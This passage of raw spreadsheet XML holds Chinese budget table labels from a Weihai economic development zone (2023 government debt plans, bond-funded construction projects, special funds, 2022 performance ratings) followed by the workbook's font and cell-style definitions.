    <t>其他专项</t>
  </si>
  <si>
    <t>棚户区
改造</t>
  </si>
  <si>
    <t>表45</t>
  </si>
  <si>
    <t>2023年经技区政府债务收支计划表</t>
  </si>
  <si>
    <t>一、2023年初全区政府债务余额</t>
  </si>
  <si>
    <t xml:space="preserve">     其中：区本级</t>
  </si>
  <si>
    <t xml:space="preserve">           区市合计</t>
  </si>
  <si>
    <t>二、2023年全区政府债务（转贷）收入</t>
  </si>
  <si>
    <t xml:space="preserve">     1.发行新增政府债券（转贷）收入</t>
  </si>
  <si>
    <t xml:space="preserve">       其中：新增一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">             新增专项债券</t>
  </si>
  <si>
    <t xml:space="preserve">     2.发行再融资政府债券（转贷）收入</t>
  </si>
  <si>
    <t xml:space="preserve">       其中：再融资一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">             再融资专项债券</t>
  </si>
  <si>
    <t>三、2023年全区政府债务支出</t>
  </si>
  <si>
    <t xml:space="preserve">     1.新增一般债券列入一般公共预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">     2.新增专项债券列入政府性基金预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">     3.当年政府债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">       其中：一般公共预算安排债务还本支出（不含再融资）</t>
  </si>
  <si>
    <t xml:space="preserve">             政府性基金预算安排债务还本支出（不含再融资）</t>
  </si>
  <si>
    <t xml:space="preserve">             再融资一般债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">             再融资专项债券还本支出</t>
  </si>
  <si>
    <t>四、2023年全区政府债务付息及发行费支出</t>
  </si>
  <si>
    <t xml:space="preserve">       其中：政府一般债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">             政府专项债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">             政府一般债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">             政府专项债务发行费用支出</t>
  </si>
  <si>
    <t>五、2023年末全区地方政府债务余额</t>
  </si>
  <si>
    <t xml:space="preserve">       其中：区本级</t>
  </si>
  <si>
    <t xml:space="preserve">             区市合计</t>
  </si>
  <si>
    <t>六、2023年全区地方政府债务限额</t>
  </si>
  <si>
    <t>备注：年末全市政府债务余额=年初政府债务余额+当年政府债务收入-当年政府债务还本支出</t>
  </si>
  <si>
    <t>表46</t>
  </si>
  <si>
    <t>2023年经技区政府债务（转贷）收入分区市计划表</t>
  </si>
  <si>
    <t>一般债务转贷收入</t>
  </si>
  <si>
    <t>专项债务转贷收入</t>
  </si>
  <si>
    <t>表47</t>
  </si>
  <si>
    <t>一、2023年初区本级政府债务余额</t>
  </si>
  <si>
    <t>二、2023年区本级政府债务（转贷）收入</t>
  </si>
  <si>
    <t xml:space="preserve">   1.新增政府债务（转贷）收入</t>
  </si>
  <si>
    <t xml:space="preserve">     其中：新增一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">           新增专项债券</t>
  </si>
  <si>
    <t xml:space="preserve">   2.发行再融资债券（转贷）收入</t>
  </si>
  <si>
    <t xml:space="preserve">     其中：再融资一般债券</t>
  </si>
  <si>
    <t xml:space="preserve">           再融资专项债券</t>
  </si>
  <si>
    <t>三、2023年区本级政府债务支出</t>
  </si>
  <si>
    <t xml:space="preserve">   1.新增一般债券列入市本级一般公共预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">   2.新增专项债券列入市本级政府性基金预算项目支出</t>
  </si>
  <si>
    <t xml:space="preserve">  其中：中韩自贸示范区基础设施配套</t>
  </si>
  <si>
    <t xml:space="preserve">        经区2023年老旧小区改造项目</t>
  </si>
  <si>
    <t xml:space="preserve">        深海工程高端装备产业基地</t>
  </si>
  <si>
    <t xml:space="preserve">   3.转贷区市政府债务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其中：转贷区市新增一般债券支出</t>
  </si>
  <si>
    <t xml:space="preserve">            转贷区市新增专项债券支出</t>
  </si>
  <si>
    <t xml:space="preserve">            转贷区市再融资一般债券支出</t>
  </si>
  <si>
    <t xml:space="preserve">            转贷区市再融资专项债券支出</t>
  </si>
  <si>
    <t xml:space="preserve">   4.区本级债务还本支出</t>
  </si>
  <si>
    <t>四、2023年区本级政府债务付息及发行费支出</t>
  </si>
  <si>
    <t>五、2023年末区本级地方政府债务余额</t>
  </si>
  <si>
    <t>六、2023年市本级地方政府债务限额</t>
  </si>
  <si>
    <t>备注：年末市本级政府债务余额=年初市本级政府债务余额+当年政府债务收入-转贷区市政府债务支出-市本级债务还本支出</t>
  </si>
  <si>
    <t>表48</t>
  </si>
  <si>
    <t>2023年经技区地方政府新增政府债券安排重大建设项目情况表</t>
  </si>
  <si>
    <t>投资
总规模</t>
  </si>
  <si>
    <t>资金来源</t>
  </si>
  <si>
    <t xml:space="preserve">项目必要性和
可行性说明
</t>
  </si>
  <si>
    <t>1.政府补助</t>
  </si>
  <si>
    <t>2.自筹
资金</t>
  </si>
  <si>
    <t>一般公共预算</t>
  </si>
  <si>
    <t>政府性基金预算</t>
  </si>
  <si>
    <t>新增一般债券</t>
  </si>
  <si>
    <t>其他一般公共预算资金安排</t>
  </si>
  <si>
    <t>其他政府性基金预算安排</t>
  </si>
  <si>
    <t>中韩自贸地方经济合作示范区园区基础设施配套工程</t>
  </si>
  <si>
    <t>项目建成可进一步完善城市功能，全面提升整体环境；改善投资环境，促进经济发展；提高区内基础设施质量，为居民营造良好的生活环境；为该区域企业产业发展创造良好的基础条件。本项目具有良好的社会效益。</t>
  </si>
  <si>
    <t>威海经开区2023年老旧小区改造工程项目</t>
  </si>
  <si>
    <t>老旧小区提升改造项目是关注和改善民生的需要；是构建和谐社区的需要；是提升城市良好形象的需要；符合威海市城市规划。</t>
  </si>
  <si>
    <t>深海工程高端装备产业基地</t>
  </si>
  <si>
    <t>项目占地面积261亩，总建筑面积20万平方米，包括建设厂房20栋，、科研中心2栋、动力中心及生活配套设施；同时在园区内铺设蒸汽管道4.2km、供水管道3.7km、排水管道3.8km、供热管道2.4km、燃气管道1.6km；新修道路合计约6.3公里、维修改造道路4.5公里，绿化面积2万㎡。</t>
  </si>
  <si>
    <t>备注：主要选取投资规模较大和对本地区有重要影响的重大建设项目。</t>
  </si>
  <si>
    <t>表49</t>
  </si>
  <si>
    <t>2023年经技区财政专项资金目录清单表</t>
  </si>
  <si>
    <t>专项资金名称</t>
  </si>
  <si>
    <t>2023年预算</t>
  </si>
  <si>
    <t>区业务主管部门</t>
  </si>
  <si>
    <t>一般公共
预算</t>
  </si>
  <si>
    <t>政府性基金
预算</t>
  </si>
  <si>
    <t>居民养老保险财政补助</t>
  </si>
  <si>
    <t>居民医疗保险财政补助</t>
  </si>
  <si>
    <t>义务教育经费保障</t>
  </si>
  <si>
    <t>公共卫生服务</t>
  </si>
  <si>
    <t>计划生育服务</t>
  </si>
  <si>
    <t>知识产权专项资金</t>
  </si>
  <si>
    <t>农业保险保费补贴</t>
  </si>
  <si>
    <t>表50</t>
  </si>
  <si>
    <t>2022年经技区重点绩效评价情况表</t>
  </si>
  <si>
    <t>绩效等级</t>
  </si>
  <si>
    <t>生活垃圾分类工作经费</t>
  </si>
  <si>
    <t>建设局</t>
  </si>
  <si>
    <t>中</t>
  </si>
  <si>
    <t>中韩自贸区园区基础设施配套</t>
  </si>
  <si>
    <t>广安城投公司</t>
  </si>
  <si>
    <t>良</t>
  </si>
  <si>
    <t>服务贸易产业园互联网+创新研究中心及配套</t>
  </si>
  <si>
    <t>智慧谷公司</t>
  </si>
  <si>
    <t>城市社区党组织服务群众专项经费</t>
  </si>
  <si>
    <t>党群工作部</t>
  </si>
  <si>
    <t>消防器材装备采购经费</t>
  </si>
  <si>
    <t>消防大队</t>
  </si>
  <si>
    <t>学校教育教学设备采购</t>
  </si>
  <si>
    <t>教育分局</t>
  </si>
  <si>
    <t>科技创新局</t>
  </si>
  <si>
    <t>新旧动能转换扶持企业发展政策全周期跟踪问效</t>
  </si>
  <si>
    <t>经发局、商务局、市场监督管理局、社会工作部</t>
  </si>
  <si>
    <t>创业担保贷款区级贴息资金</t>
  </si>
  <si>
    <t>市政城市维护费成本绩效分析</t>
  </si>
  <si>
    <t>行政审批服务局部门整体绩效评价</t>
  </si>
  <si>
    <t>行政审批服务局</t>
  </si>
  <si>
    <t>表51</t>
  </si>
  <si>
    <t>2022年经技区财政专户管理资金收支执行情况表</t>
  </si>
  <si>
    <t>收入科目</t>
  </si>
  <si>
    <t>支出科目</t>
  </si>
  <si>
    <t>一、行政事业性收费收入
    (教育收费)</t>
  </si>
  <si>
    <t>一、教育支出</t>
  </si>
  <si>
    <t>二、其他收入</t>
  </si>
  <si>
    <t>二、其他各项支出</t>
  </si>
  <si>
    <t>结转下年支出</t>
  </si>
  <si>
    <t>备注：区级没有教育收费等收入，没有相应财政专户管理资金</t>
  </si>
  <si>
    <t>表52</t>
  </si>
  <si>
    <t>2023年经技区财政专户管理资金收支计划草案表</t>
  </si>
  <si>
    <t>2023年
计划数</t>
  </si>
  <si>
    <t>2022年
执行数</t>
    <phoneticPr fontId="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</si>
</sst>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 #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="43" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="176" formatCode="0_ "/>
    <numFmt numFmtId="177" formatCode="0.0_ "/>
    <numFmt numFmtId="178" formatCode="0_);[Red]\(0\)"/>
    <numFmt numFmtId="179" formatCode="0.0%"/>
    <numFmt numFmtId="180" formatCode="0.00_ "/>
    <numFmt numFmtId="181" formatCode="0.0000_ "/>
    <numFmt numFmtId="182" formatCode="0.0_);[Red]\(0.0\)"/>
    <numFmt numFmtId="183" formatCode="m&quot;月&quot;d&quot;日&quot;;@"/>
    <numFmt numFmtId="184" formatCode="#,##0.0"/>
  </numFmts>
  <fonts count="56">
    <font>
      <sz val="10"/>
      <name val="Helv"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="16"/>
      <name val="文星简小标宋"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="黑体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="0"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="16"/>
      <color indexed="8"/>
      <name val="文星简小标宋"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="黑体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="20"/>
      <name val="方正小标宋简体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="黑体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="黑体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="18"/>
      <name val="文星简小标宋"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="文星简小标宋"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="0"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="20"/>
      <name val="文星简大标宋"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="文星简小标宋"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="0"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="28"/>
      <name val="文星简小标宋"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="3">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00B05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style="thin">
        <color auto="1"/>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indexed="8"/>
      </left>
      <right style="thin">
        <color indexed="8"/>
      </right>
      <top/>
      <bottom style="thin">
        <color indexed="8"/>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diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color indexed="8"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="52">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="41"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52" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="0"/>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0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4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41" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="791">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="33" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="33" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="0" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="13" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="13" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="2" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="2" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="13" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="13" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="1" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="1" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="2" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="1" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="13" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="0" borderId="0" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="righ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Fill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="176" fontId="9"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1" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="12" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="12" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="14" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="15" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="12" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="12" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="180" fontId="3" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="5" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
